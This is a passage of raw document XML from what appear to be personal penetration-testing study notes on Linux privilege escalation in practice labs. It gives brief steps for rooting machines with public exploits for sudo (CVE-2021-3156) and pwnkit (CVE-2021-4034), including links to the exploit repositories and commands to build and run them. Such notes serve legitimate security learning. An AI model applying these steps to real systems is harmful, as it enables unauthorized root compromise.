        </w:rPr>
        <w:t xml:space="preserve">For example, /login or maybe just / if you don't want any path</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003030">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003031">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003032">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003033">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34">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003035">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003036">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003037">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fv19khz980st" w:id="425"/>
      <w:bookmarkEnd w:id="425"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003038">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003039">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sudo version 1.8.31 was exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Relia Challenge Lab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on machine </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.xxx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.245. We also saw it on .143 of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-A Challenge Lab </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">but they didn't allow us to run "make" on that machine, and when we compiled on local kali and then exported the executable, it didn't work</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Also seen in XXXXXXXXX-B .149 but idk if it works</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Sudo Version 1.8.31 using CVE-2021-3156</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1062">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/CptGibbon/CVE-2021-3156</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000303F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basically, you have to download shellcode.c, exploit.c, and Makefile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003040">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download this ON the victim machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003041">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then get them all into same directory in the SSH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003042">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then run:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003043">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1208"/>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make</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003044">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="ff0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">./exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003045">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1208"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we have root!</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003046">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003047">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003048">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to check sudo version:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003049">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -V</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Find the version of the sudo because as shown in the Paper HTB, it was vulnerable to sudo exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, in the case of Paper HTB, the sudo -V told us the version but after googling, I couldn't find the CVE that they wanted. You actually had to use linpeas to find the CVE vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="82"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But, this was my first sudo vulnerability and a time where linpeas was the only solution, so make sure to use that!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000304F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003050">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3vdgyxc70kts" w:id="426"/>
      <w:bookmarkEnd w:id="426"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Root shell using sudo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003051">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003052">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3028950" cy="1666875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="442" name="image432.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image432.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId1063"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="30289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3053">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The first 3 all open shell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1177"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The last one allows you to change the password </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003055">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000030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57">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cjfkey69z38r" w:id="427"/>
      <w:bookmarkEnd w:id="427"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwnkit and polkit (/usr/bin/pwnkit) (CVE-2021-4034)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003058">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00003059">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From Lina's cheatsheet</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="407"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">pwnkit exploit has python version: pkexec 0.105-26, 0.117-2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId1064">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Snookums</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Practice they found CVE-2021-4034 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">highlighted in yellow from linPEAS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. They used this exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:hyperlink r:id="rId1065">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/joeammond/CVE-2021-4034</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="485"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They also mentioned </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exghost PG Practice</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> has the same vulnerability </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000305F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
